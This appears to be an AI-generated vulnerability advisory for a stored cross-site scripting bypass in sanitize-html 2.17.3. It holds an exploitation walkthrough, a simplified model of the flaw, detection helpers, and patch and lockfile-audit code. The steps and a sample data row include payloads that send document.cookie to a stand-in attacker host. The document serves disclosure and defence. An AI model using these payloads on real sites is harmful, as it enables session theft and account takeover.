CVE-2026-44990
JavaScript Vulnerability Analysis and Mitigation

Overview

CVE-2026-44990 is a stored cross-site scripting (XSS) vulnerability in the sanitize-html npm package (bundled with ApostropheCMS), caused by improper handling of the <xmp> raw-text element under the default configuration. An unauthenticated remote attacker who can submit HTML content can smuggle arbitrary <script> tags or event-handler payloads through the sanitizer; the payload then executes in victims' browsers when the stored content is rendered. The advisory lists sanitize-html 2.17.3 as the affected version (described as the release in which the flaw was introduced), with the fix shipped in 2.17.4. The vulnerability carries a CVSS v3.1 base score of 9.3 (Critical) (GitHub Advisory). The advisory was published on May 13, 2026, and added to the GitHub Advisory Database on May 14, 2026 (GitHub Advisory).

Technical details

The root cause (CWE-79) lies in how sanitize-html@2.17.3 handles the <xmp> HTML element. htmlparser2 treats xmp as a raw-text element, so everything between <xmp> and </xmp> is handed to the sanitizer as a single text node rather than parsed as markup. Ordinarily that is harmless: text inside a disallowed tag is either dropped, when the tag is listed in nonTextTags, or HTML-escaped before it is emitted. Two details break this for xmp. The default nonTextTags list in index.js (lines 138–142) includes only script, style, textarea, and option, so the contents of a discarded <xmp> are not dropped; and the ontext handler at lines 569–577 special-cases xmp and appends its text content directly to the sanitized output without escaping (result += text). Markup that the parser saw as text is therefore re-emitted as raw HTML, so a payload such as <xmp><script>alert(1)</script> passes through sanitization and becomes live JavaScript when inserted into the DOM (GitHub Advisory, Patch Commit). No authentication or special privileges are required; the attacker only needs the ability to submit HTML content to an application that runs sanitize-html with the default disallowedTagsMode: 'discard' configuration.

Impact

Successful exploitation enables stored XSS, allowing a remote attacker to inject and persistently execute arbitrary JavaScript in the browsers of any user who views the affected content. This can lead to session token theft, credential harvesting, account takeover, defacement, and further client-side attacks such as redirecting users to malicious sites. The CVSS scope is marked as "Changed," reflecting that the impact extends beyond the vulnerable component to the users' browser environments, with high confidentiality and integrity impact (GitHub Advisory).

Exploitation steps

  1. Identify a target application: Find a web application that uses sanitize-html version 2.17.3 (e.g., ApostropheCMS instances) with the default disallowedTagsMode: 'discard' configuration and renders sanitized HTML output back to users.
  2. Craft the payload: Construct an HTML payload that wraps malicious markup inside an <xmp> element, such as <xmp><script>alert(document.cookie)</script> or <xmp><img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>.
  3. Submit the payload: Submit the crafted payload through any user-controlled HTML input field (e.g., a comment box, rich-text editor, or profile field) that passes content through sanitize-html before storage.
  4. Sanitizer bypass occurs: The sanitize-html library parses the <xmp> content as raw text (via htmlparser2) and re-emits it unescaped into the sanitized output, stripping the <xmp> wrapper but leaving the inner <script> or event-handler markup as live HTML.
  5. Trigger execution: When another user (e.g., an administrator or victim) views the page containing the stored content, the browser interprets the unescaped markup as live HTML/JavaScript, executing the attacker's payload and potentially exfiltrating session cookies or performing actions on behalf of the victim (GitHub Advisory, Patch Commit).
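The following is an added example, not sanitize-html's code and not part of the advisory: a deliberately small model of the discard path described in the technical details and walked through in the steps above. It reproduces only the two properties the bypass depends on (a raw-text element whose content reaches the sanitizer as one text node, and an ontext path that re-emits a discarded <xmp>'s text unescaped unless the tag is in nonTextTags). The tokenizer, the allowlist of p/b/i/a, the rawXmpQuirk switch and the payload string are constructed for the demonstration; running it shows the same input coming out live under the 2.17.3 defaults and empty once xmp is in nonTextTags.

```javascript
// Added example: simplified model of the sanitize-html@2.17.3 discard path.
// Not sanitize-html's code; tokenizer, allowlist and payloads are constructed.

// Elements whose content htmlparser2-style parsers treat as raw text: everything
// up to the matching close tag is one text node, never parsed as markup.
const RAW_TEXT_TAGS = new Set(['script', 'style', 'textarea', 'xmp']);

// nonTextTags defaults before and after the fix, as the advisory describes them.
const NON_TEXT_TAGS_2_17_3 = ['script', 'style', 'textarea', 'option'];
const NON_TEXT_TAGS_2_17_4 = ['script', 'style', 'textarea', 'option', 'xmp'];

function escapeHtml(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;')
          .replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

// Tokenize into open/close/text tokens. A raw-text element swallows everything
// up to its close tag as a single text token: "<script>" inside <xmp> is text
// to the parser, not an element, which is exactly what the bypass relies on.
function tokenize(html) {
  const tokens = [];
  let i = 0;
  while (i < html.length) {
    if (html[i] !== '<') {
      const next = html.indexOf('<', i);
      const end = next === -1 ? html.length : next;
      tokens.push({ type: 'text', text: html.slice(i, end) });
      i = end;
      continue;
    }
    const m = /^<(\/?)([a-zA-Z][a-zA-Z0-9]*)[^>]*>/.exec(html.slice(i));
    if (!m) {                                  // a bare "<" that starts no tag is text
      tokens.push({ type: 'text', text: '<' });
      i += 1;
      continue;
    }
    const name = m[2].toLowerCase();
    i += m[0].length;
    if (m[1] === '/') { tokens.push({ type: 'close', name }); continue; }
    tokens.push({ type: 'open', name });
    if (RAW_TEXT_TAGS.has(name)) {
      const rest = html.slice(i);
      const close = new RegExp('</' + name + '\\s*>', 'i').exec(rest);
      const end = close ? close.index : rest.length;   // unterminated: runs to end of input
      tokens.push({ type: 'text', text: rest.slice(0, end) });
      i += end;
      if (close) { tokens.push({ type: 'close', name }); i += close[0].length; }
    }
  }
  return tokens;
}

// Discard-mode sanitizer. rawXmpQuirk reproduces the 2.17.3 ontext special
// case: text inside a discarded <xmp> is appended without escaping.
function sanitize(html, { allowedTags = ['p', 'b', 'i', 'a'],
                          nonTextTags = NON_TEXT_TAGS_2_17_3,
                          rawXmpQuirk = true } = {}) {
  let out = '';
  const stack = [];                            // open element names, allowed or not
  for (const tok of tokenize(html)) {
    if (tok.type === 'open') {
      stack.push(tok.name);
      if (allowedTags.includes(tok.name)) out += '<' + tok.name + '>'; // attributes dropped in this model
    } else if (tok.type === 'close') {
      const idx = stack.lastIndexOf(tok.name);
      if (idx === -1) continue;                // stray close tag: dropped
      stack.length = idx;
      if (allowedTags.includes(tok.name)) out += '</' + tok.name + '>';
    } else {
      const tag = stack[stack.length - 1];
      const disallowed = tag !== undefined && !allowedTags.includes(tag);
      if (disallowed && nonTextTags.includes(tag)) continue;            // content dropped with the tag
      if (disallowed && tag === 'xmp' && rawXmpQuirk) out += tok.text;  // the bug: raw re-emit
      else out += escapeHtml(tok.text);                                 // normal path: escaped
    }
  }
  return out;
}

// Constructed payload, the one from the steps above wrapped in some benign markup.
const PAYLOAD = '<p>hello</p><xmp><script>alert(document.cookie)</script>';

if (typeof require !== 'undefined' && require.main === module) {
  console.log('2.17.3 defaults   :', sanitize(PAYLOAD));
  console.log('xmp in nonTextTags:', sanitize(PAYLOAD, { nonTextTags: NON_TEXT_TAGS_2_17_4 }));
  console.log('no xmp quirk      :', sanitize(PAYLOAD, { rawXmpQuirk: false }));
}
```

The third line of output is the behaviour the sanitizer would have had without the special case: the inner markup comes out as &lt;script&gt;…, inert. Putting xmp in nonTextTags goes further and drops the contents along with the tag, which is what the 2.17.4 default does.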

Indicators of compromise

  • Network: Outbound HTTP requests from victim browsers to unexpected external domains (e.g., attacker-controlled servers) immediately after viewing user-generated content pages; unusual fetch or XMLHttpRequest calls visible in browser developer tools or proxy logs.
  • Logs: Request bodies captured by a WAF, reverse proxy or application-level logging that contain <xmp> tags submitted to input endpoints (an ordinary access log records the URL, not the body, and will not show this); stored database entries containing raw <script> tags or event-handler attributes (e.g., onerror=, onload=) in fields that are supposed to hold sanitized HTML.
  • File System: If the application stores sanitized HTML to disk or a cache, presence of unescaped <script> blocks or inline event handlers in stored HTML files or cache entries.
  • Process/Application Behavior: Unexpected JavaScript execution errors or alerts reported by users viewing content pages; Content Security Policy (CSP) violation reports referencing inline scripts in pages that render user-generated content (GitHub Advisory).
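As an added example (not part of the advisory), the three indicator classes above turned into triage code: a scan of stored content for markup that sanitize-html should have neutralised, a scan of captured request bodies for <xmp> submissions, and a filter over CSP violation reports for blocked inline scripts on pages that render user content. The record shapes, the content-path prefixes and all sample data are constructed; the one design point worth noting is that the patterns match only live markup, so correctly escaped output (&lt;script&gt;) is not flagged.

```javascript
// Added example: triage helpers for the indicators listed above. Not from the
// advisory; record shapes and sample data are constructed.

// Live markup that a working sanitizer would have escaped or dropped. The safe
// form (&lt;script&gt;) deliberately does not match these patterns.
const LIVE_SCRIPT_RE = /<script\b/i;
const INLINE_HANDLER_RE = /<[a-z][^>]*\son[a-z]+\s*=/i;   // on* attribute inside a tag
const XMP_RE = /<xmp\b/i;

// rows: [{ id, field, html }] as read back from the datastore, i.e. the value
// the application stored *after* running sanitize-html.
function findLiveMarkup(rows) {
  const hits = [];
  for (const r of rows) {
    const reasons = [];
    if (LIVE_SCRIPT_RE.test(r.html)) reasons.push('script tag');
    if (INLINE_HANDLER_RE.test(r.html)) reasons.push('inline event handler');
    if (reasons.length) hits.push({ id: r.id, field: r.field, reasons });
  }
  return hits;
}

// submissions: [{ ts, user, endpoint, body }] from any layer that records request
// bodies (WAF, application log, proxy with body logging). A plain access log
// records the URL, not the body, and is not enough here.
function findXmpSubmissions(submissions) {
  return submissions
    .filter(s => XMP_RE.test(s.body))
    .map(s => ({ ts: s.ts, user: s.user, endpoint: s.endpoint }));
}

// reports: CSP report-uri payloads. A blocked inline script on a page that
// renders user-generated content is the signal; the path prefixes are assumed.
function inlineScriptViolations(reports, contentPathPrefixes = ['/posts/', '/profiles/']) {
  return reports.filter(r => {
    const rep = r['csp-report'] || {};
    const directive = rep['effective-directive'] || rep['violated-directive'] || '';
    const uri = rep['document-uri'] || '';
    let path;
    try { path = new URL(uri).pathname; } catch (e) { path = uri; }
    return directive.startsWith('script-src') && rep['blocked-uri'] === 'inline'
      && contentPathPrefixes.some(p => path.startsWith(p));
  });
}

// Constructed samples.
const STORED_ROWS = [
  { id: 1, field: 'comment.body', html: '<p>looks good</p>' },
  { id: 2, field: 'comment.body', html: '<p>&lt;script&gt;alert(1)&lt;/script&gt;</p>' }, // correctly escaped
  { id: 3, field: 'comment.body', html: '<p>hi</p><script>fetch("https://attacker.example/?c="+document.cookie)</script>' },
  { id: 4, field: 'profile.bio',  html: '<img src=x onerror=alert(1)>' },
];
const SUBMISSIONS = [
  { ts: '2026-05-14T10:01:00Z', user: 'mallory', endpoint: '/api/comments', body: '<xmp><script>alert(1)</script>' },
  { ts: '2026-05-14T10:02:00Z', user: 'alice',   endpoint: '/api/comments', body: '<p>thanks</p>' },
];
const CSP_REPORTS = [
  { 'csp-report': { 'document-uri': 'https://app.example/posts/42', 'effective-directive': 'script-src-elem', 'blocked-uri': 'inline' } },
  { 'csp-report': { 'document-uri': 'https://app.example/admin',    'effective-directive': 'img-src',         'blocked-uri': 'https://cdn.example/x.png' } },
];

if (typeof require !== 'undefined' && require.main === module) {
  console.log('live markup in store :', findLiveMarkup(STORED_ROWS));
  console.log('xmp submissions      :', findXmpSubmissions(SUBMISSIONS));
  console.log('inline-script CSP    :', inlineScriptViolations(CSP_REPORTS).length);
}
```

Row 2 is the case to keep in mind when reading results: escaped angle brackets in the store are the sanitizer doing its job, and a scan that decodes entities before matching would flag them as false positives.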

Mitigation and workarounds

The primary remediation is to update sanitize-html to version 2.17.4, which adds xmp to the default nonTextTags list so its contents are dropped entirely when the tag is disallowed (Patch Commit, GitHub Advisory). Because sanitize-html is also shipped inside other packages such as ApostropheCMS, check the lockfile for nested copies rather than only the top-level dependency. As an interim workaround, explicitly add xmp to the nonTextTags option in your sanitize-html configuration: nonTextTags: ['style', 'script', 'textarea', 'option', 'xmp']. Output-encoding the sanitized string is not a substitute: the sanitizer's output is meant to be inserted as HTML, so encoding it breaks legitimate markup, and the bypass happens before that point. Treat the sanitizer as one layer and deploy a strict Content Security Policy (for example a nonce- or hash-based script-src without 'unsafe-inline') so that a smuggled inline script is blocked rather than executed, and route CSP violation reports somewhere they are read.
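Two pieces of the remediation above, written out as an added example (not code from sanitize-html, ApostropheCMS or the advisory): an options wrapper that applies the interim workaround without losing the library's documented default nonTextTags, and a package-lock.json audit that finds every installed copy of sanitize-html, nested ones included, and flags anything below 2.17.4. The cut-off is the conservative reading given the open question about scope noted under Community reactions. The package name "some-cms" and the lockfile excerpt are constructed.

```javascript
// Added example: interim-workaround wrapper and lockfile audit. Not from
// sanitize-html or the advisory; the sample lockfile is constructed.

// sanitize-html's documented default nonTextTags (what 2.17.3 ships).
const DEFAULT_NON_TEXT_TAGS = ['script', 'style', 'textarea', 'option'];

// Wrap the options you already pass to sanitizeHtml(): keeps the caller's
// nonTextTags, fills in the defaults, and guarantees xmp is present.
// Usage with the real library: sanitizeHtml(dirty, hardenOptions(myOptions))
function hardenOptions(options = {}) {
  const merged = new Set([...DEFAULT_NON_TEXT_TAGS, ...(options.nonTextTags || []), 'xmp']);
  return { ...options, nonTextTags: [...merged] };
}

const FIXED_VERSION = '2.17.4';

// "2.17.3" -> [2, 17, 3]; prerelease and build suffixes are ignored for this check.
function parseVersion(v) {
  const parts = v.split('-')[0].split('+')[0].split('.').map(n => parseInt(n, 10) || 0);
  while (parts.length < 3) parts.push(0);
  return parts;
}

function versionLess(a, b) {
  const pa = parseVersion(a);
  const pb = parseVersion(b);
  for (let i = 0; i < 3; i++) if (pa[i] !== pb[i]) return pa[i] < pb[i];
  return false;
}

// package-lock.json (lockfileVersion 2 or 3) keys every installed copy by its
// path, so copies nested under other packages are found as well.
function auditLockfile(lock) {
  const findings = [];
  for (const [p, meta] of Object.entries(lock.packages || {})) {
    if (p === 'node_modules/sanitize-html' || p.endsWith('/node_modules/sanitize-html')) {
      findings.push({ path: p, version: meta.version, needsUpdate: versionLess(meta.version, FIXED_VERSION) });
    }
  }
  return findings;
}

// Constructed lockfile excerpt: a direct dependency on 2.17.3 and a nested copy
// under a hypothetical package "some-cms" that already carries the fixed version.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'my-app', version: '1.0.0' },
    'node_modules/sanitize-html': { version: '2.17.3' },
    'node_modules/some-cms': { version: '4.0.0' },
    'node_modules/some-cms/node_modules/sanitize-html': { version: '2.17.4' },
  },
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log(hardenOptions({ allowedTags: ['p', 'b'] }).nonTextTags);
  for (const f of auditLockfile(SAMPLE_LOCK)) {
    console.log(`${f.path}@${f.version}: ${f.needsUpdate ? 'UPDATE' : 'ok'}`);
  }
}
```

The wrapper is a stopgap for the window between discovering a vulnerable copy and getting the dependency bumped; once 2.17.4 is installed everywhere the audit reports, the default already contains xmp and the wrapper is redundant but harmless.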

Community reactions

The vulnerability was reported by security researcher Vincenzo Turturro (GitHub: sushi-gif) and published by ApostropheCMS maintainer boutell on May 13, 2026 (GitHub Advisory). A community issue was opened shortly after to clarify whether the vulnerability was introduced specifically in version 2.17.3 or affected all versions ≤ 2.17.3, reflecting some ambiguity in the initial advisory scope (apostrophecms/apostrophe#5418). The patch commit message explicitly urges all users of sanitize-html to update immediately (Patch Commit).

Additional resources

Source

This report was generated using AI.

Related JavaScript vulnerabilities:

CVE ID         | Severity | Score | Technologies | Component name     | CISA KEV exploit | Fixed | Publication date
CVE-2026-44990 | CRITICAL | 9.3   | JavaScript   | sanitize-html      | No               | Yes   | Jun 12, 2026
CVE-2026-45013 | HIGH     | 8.1   | JavaScript   | apostrophe         | No               | No    | Jun 12, 2026
CVE-2026-45012 | HIGH     | 7.6   | JavaScript   | apostrophe         | No               | No    | Jun 12, 2026
CVE-2026-45011 | HIGH     | 7.3   | JavaScript   | apostrophe         | No               | No    | Jun 12, 2026
CVE-2026-42853 | MEDIUM   | 6.5   | JavaScript   | @apostrophecms/cli | No               | No    | Jun 12, 2026
